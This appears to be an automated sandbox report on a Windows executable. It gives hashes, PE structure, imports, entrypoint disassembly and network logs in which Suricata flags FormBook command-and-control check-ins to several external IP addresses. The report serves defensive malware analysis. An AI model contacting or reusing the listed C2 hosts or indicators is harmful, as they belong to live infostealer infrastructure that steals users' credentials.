                                                                                                                    Preview:...7D8A8\IJ9..OJ.AL0QHNBwG8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMA.0QH@].I8.1.h.8..n.%(?.!:!%E&Ua[9'$V!u-/m39^q! bs.kaU7-/.XXEnMAL0QHN;6N.|X?.wY2.r**.V...t"P.".u*^.O..},W..'!_zX&.XIJ9UUOJ..L0.IOB.z..8XIJ9UUO.MCM;PCNB}C8A8XIJ9UUO_MAL QHN"3G8AxXIZ9UUMJMGL0QHNB7A8A8XIJ9U5KJMCL0QHNB5Gx.8XYJ9EUOJMQL0AHNB7G8Q8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9{!*29AL0..JB7W8A8.MJ9EUOJMAL0QHNB7G8a8X)J9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9UUOJMAL0QHNB7G8A8XIJ9U

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.2104593851161285
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:9MZZG92yMO.exe
                                                                                                                    File size:1'210'880 bytes
                                                                                                                    MD5:7f427f12cd43c97f6647a6a39735eba8
                                                                                                                    SHA1:b6e68860ffd9fddf9e3248b0d89365eab8e4310c
                                                                                                                    SHA256:c3435c7d8eb6822ff755dd1f48266e8bc267a8d8b87fee7a4ebe8ec8efdd1c30
                                                                                                                    SHA512:c4b0c74dd8c3c275da485abbbd5dfa60489e3612aa0baf23d469f00aae61e49464fc802a8cdfbfb3f3eb690422691a03887a437ecb9a1ea711c270f354d61ca8
                                                                                                                    SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6FaV2aWbcSnnsa7anLumD99WY:iu0c++OCvkGs9FaVKZnsOanFyY
                                                                                                                    TLSH:4C45BE22B3DD8360CB6A9173BF6D77016EBFB8650630F95B1F880D79AD501A1163C6A3
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

                                                                                                                    File Icon

                                                                                                                    Icon Hash:f4c8ccced8c884d4

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x427dcd
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x675A1C47 [Wed Dec 11 23:12:07 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007F56C0B1A54Ah
                                                                                                                    jmp 00007F56C0B0D314h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007F56C0B0D49Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007F56C0B0D7FEh
                                                                                                                    bt dword ptr [004C31FCh], 01h
                                                                                                                    jnc 00007F56C0B0D499h
                                                                                                                    rep movsb
                                                                                                                    jmp 00007F56C0B0D7ACh
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007F56C0B0D664h
                                                                                                                    mov eax, edi
                                                                                                                    xor eax, esi
                                                                                                                    test eax, 0000000Fh
                                                                                                                    jne 00007F56C0B0D4A0h
                                                                                                                    bt dword ptr [004BE324h], 01h
                                                                                                                    jc 00007F56C0B0D970h
                                                                                                                    bt dword ptr [004C31FCh], 00000000h
                                                                                                                    jnc 00007F56C0B0D63Dh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007F56C0B0D64Eh
                                                                                                                    test esi, 00000003h
                                                                                                                    jne 00007F56C0B0D62Dh
                                                                                                                    bt edi, 02h
                                                                                                                    jnc 00007F56C0B0D49Fh
                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                    sub ecx, 04h
                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [edi], eax
                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                    bt edi, 03h
                                                                                                                    jnc 00007F56C0B0D4A3h
                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                    sub ecx, 08h
                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                    test esi, 00000007h
                                                                                                                    je 00007F56C0B0D4F5h
                                                                                                                    bt esi, 03h
                                                                                                                    jnc 00007F56C0B0D548h

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2013 UPD4 build 31101
                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                    • [LNK] VS2013 UPD4 build 31101

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5f200.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1270000x711c.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xc70000x5f2000x5f2003f31ba28eaff7d2690bbde2d322ea380False0.9412933229303548data7.936633454100918IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0x1270000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xc74e80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xc76100x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xc77380x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xc78600x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.24202127659574468
                                                                                                                    RT_ICON0xc7cc80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishGreat Britain0.145264116575592
                                                                                                                    RT_ICON0xc8df00x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishGreat Britain0.09723352318958503
                                                                                                                    RT_ICON0xcb4580x2b56PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishGreat Britain0.9077879935100054
                                                                                                                    RT_MENU0xcdfb00x50dataEnglishGreat Britain0.9
                                                                                                                    RT_STRING0xce0000x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                    RT_STRING0xce5940x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                    RT_STRING0xcec200x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                    RT_STRING0xcf0b00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xcf6ac0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xcfd080x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                    RT_STRING0xd01700x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                    RT_RCDATA0xd02c80x559efdata1.000330764207891
                                                                                                                    RT_GROUP_ICON0x125cb80x3edataEnglishGreat Britain0.8548387096774194
                                                                                                                    RT_GROUP_ICON0x125cf80x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0x125d0c0x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0x125d200x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0x125d340xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                    RT_MANIFEST0x125e100x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                    UxTheme.dllIsThemeActive
                                                                                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                    Possible Origin

                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                    EnglishGreat Britain

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2025-01-10T20:48:55.028761+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649985134.122.133.8080TCP
                                                                                                                    2025-01-10T20:48:55.028761+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649985134.122.133.8080TCP
                                                                                                                    2025-01-10T20:49:10.711109+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649987209.74.79.4180TCP
                                                                                                                    2025-01-10T20:49:13.275378+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649988209.74.79.4180TCP
                                                                                                                    2025-01-10T20:49:15.854514+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649989209.74.79.4180TCP
                                                                                                                    2025-01-10T20:49:18.456390+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649990209.74.79.4180TCP
                                                                                                                    2025-01-10T20:49:18.456390+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649990209.74.79.4180TCP
                                                                                                                    2025-01-10T20:49:24.122067+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649991104.21.112.180TCP
                                                                                                                    2025-01-10T20:49:26.676734+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649993104.21.112.180TCP
                                                                                                                    2025-01-10T20:49:29.242866+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649994104.21.112.180TCP
                                                                                                                    2025-01-10T20:49:31.809809+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649995104.21.112.180TCP
                                                                                                                    2025-01-10T20:49:31.809809+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649995104.21.112.180TCP
                                                                                                                    2025-01-10T20:49:39.360380+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649996112.175.247.17980TCP
                                                                                                                    2025-01-10T20:49:41.906132+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649997112.175.247.17980TCP
                                                                                                                    2025-01-10T20:49:44.683696+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649998112.175.247.17980TCP
                                                                                                                    2025-01-10T20:49:46.967443+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649999112.175.247.17980TCP
                                                                                                                    2025-01-10T20:49:46.967443+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649999112.175.247.17980TCP
                                                                                                                    2025-01-10T20:49:52.737586+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650000194.9.94.8680TCP
                                                                                                                    2025-01-10T20:49:55.363011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650001194.9.94.8680TCP
                                                                                                                    2025-01-10T20:49:57.836126+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650002194.9.94.8680TCP
                                                                                                                    2025-01-10T20:50:00.378766+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650004194.9.94.8680TCP
                                                                                                                    2025-01-10T20:50:00.378766+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650004194.9.94.8680TCP
                                                                                                                    2025-01-10T20:50:06.042071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650005194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:08.595629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650006194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:11.158931+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650007194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:13.690180+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650008194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:13.690180+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650008194.245.148.18980TCP
                                                                                                                    2025-01-10T20:50:28.269010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650009208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:30.843005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650010208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:33.461842+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650011208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:36.650582+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.650012208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:36.650582+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.650012208.91.197.2780TCP
                                                                                                                    2025-01-10T20:50:58.721485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.65001376.223.67.18980TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 10, 2025 20:48:54.166244030 CET4998580192.168.2.6134.122.133.80
                                                                                                                    Jan 10, 2025 20:48:54.171099901 CET8049985134.122.133.80192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:54.171185970 CET4998580192.168.2.6134.122.133.80
                                                                                                                    Jan 10, 2025 20:48:54.241776943 CET4998580192.168.2.6134.122.133.80
                                                                                                                    Jan 10, 2025 20:48:54.246640921 CET8049985134.122.133.80192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:55.028470039 CET8049985134.122.133.80192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:55.028692961 CET8049985134.122.133.80192.168.2.6
                                                                                                                    Jan 10, 2025 20:48:55.028760910 CET4998580192.168.2.6134.122.133.80
                                                                                                                    Jan 10, 2025 20:48:55.031943083 CET4998580192.168.2.6134.122.133.80
                                                                                                                    Jan 10, 2025 20:48:55.036762953 CET8049985134.122.133.80192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:10.098391056 CET4998780192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:10.103990078 CET8049987209.74.79.41192.168.2.6
                                                                                                                    Jan 10, 2025 20:49:10.104098082 CET4998780192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:10.118778944 CET4998780192.168.2.6209.74.79.41
                                                                                                                    Jan 10, 2025 20:49:10.124371052 CET8049987209.74.79.41192.168.2.6
